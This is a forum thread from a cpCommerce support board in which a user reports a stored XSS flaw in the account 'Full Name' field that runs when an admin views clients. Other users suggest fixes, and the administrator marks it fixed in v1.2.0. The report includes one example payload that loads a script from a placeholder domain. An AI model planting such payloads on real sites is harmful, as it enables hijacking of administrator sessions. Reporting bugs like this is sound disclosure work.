Latest News:
v1.2.1 Release Date is Sunday August 31st
on August 27, 2008, 08:52:45 PM [View]
Welcome, Guest. Please login or register.
August 28, 2008, 08:55:33 AM
Show Unread Posts | View Replies to Your Posts


Login with username, password and session length
cpCommerce Support  |  Version 1.x.x  |  Bug Reports  |  Resolved  |  Topic: XSS vulnerability 0 Members and 1 Guest are viewing this topic.
Pages: [1] Send this topic Print
Author Topic: XSS vulnerability  (Read 495 times)
jadoba
Junior Member
*
Offline Offline

Posts: 1


View Profile WWW
« on: May 25, 2007, 04:10:55 AM »
Javascript tags can be included in the "Full Name" field of a user's account settings. This code is then executed by the admin when the "view clients" page is brought up. Big problems can result from this. Sorry that I do not have a patch to submit. Filters for greater-than and less-than signs and their encoded counterparts would be a good idea. IMHO, limiting the name's character count to a set maximum would just be a band-aid for this exploit.

For instance, something like this in the Real Name field entered by a regular registrant:

notarealname <SCRIPT SRC=http://domain.tld/badscript.js></SCRIPT>

Can anyone reproduce this vulnerability  or am I the only one who sees it?

I suspect that it is also possible to do something similar to this in a product review submission, but I do not know and have not tested it yet.
Report to moderator   Logged
--------------------------------------------------------------------------------
James Barrett - jadoba.net
Jenius
Junior Member
*
Offline Offline

Posts: 29


View Profile WWW
« Reply #1 on: August 15, 2007, 05:55:55 PM »
Quote from: jadoba on May 25, 2007, 04:10:55 AM
IMHO, limiting the name's character count to a set maximum would just be a band-aid for this exploit.

Even if it is just a band-aid; a band-aid is still better than an open wound. Until someone comes up with a real fix, limiting the length of the account name variable (in your SQL database) is still better than nothing and I'd recommend it to anyone that knows how to do it.
Report to moderator   Logged
oracle3410
Junior Member
*
Offline Offline

Posts: 3


View Profile
« Reply #2 on: August 17, 2007, 10:07:24 AM »
htmlentities() would probably work.
Report to moderator   Logged
cpradio
Administrator
Scholarly Member
*****
Offline Offline

Posts: 4021


cpradio


View Profile
« Reply #3 on: June 21, 2008, 04:06:54 PM »
This is now in v1.2.0
Report to moderator   Logged
Pages: [1] Send this topic Print 
cpCommerce Support  |  Version 1.x.x  |  Bug Reports  |  Resolved  |  Topic: XSS vulnerability
Jump to:  

Related Topics
Subject Started by Replies Views Last post
Possible Vulnerability - attempted by hackers to exploit tinpalace 0 276 May 23, 2007, 07:01:51 AM
by tinpalace
SQL injection, admin password and email address vulnerability 9902468 2 1934 June 21, 2008, 04:08:57 PM
by cpradio

Powered by MySQL Powered by PHP cpCommerce Support | Powered by SMF 1.1.
© 2004, Simple Machines LLC. All Rights Reserved. 		Valid XHTML 1.0! Valid CSS!